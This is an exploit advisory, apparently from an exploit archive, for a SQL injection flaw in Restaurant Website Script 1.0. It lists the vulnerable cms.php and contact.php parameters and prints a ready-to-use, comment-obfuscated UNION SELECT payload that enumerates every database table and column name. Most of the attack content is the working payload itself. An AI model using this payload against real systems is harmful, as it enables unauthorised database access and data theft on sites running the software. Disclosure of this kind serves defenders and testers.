Restaurant Website Script version 1.0 suffers from a remote SQL injection vulnerability.
5020af7fa440099e7336c3abd4bdcb5ac26fd8f10a288f8948ecf43fe61b3fa2
# # # # #
# Exploit Title: Restaurant Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: https://scriptzee.com/
# Software Link: https://scriptzee.com/small-business/restaurant-website-script
# Demo: https://restaurant.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: https://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# https://localhost/[PATH]/cms.php?id=[SQL]
#
# -6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
#
# https://localhost/[PATH]/contact.php?id=[SQL]
#
# Etc..
# # # # #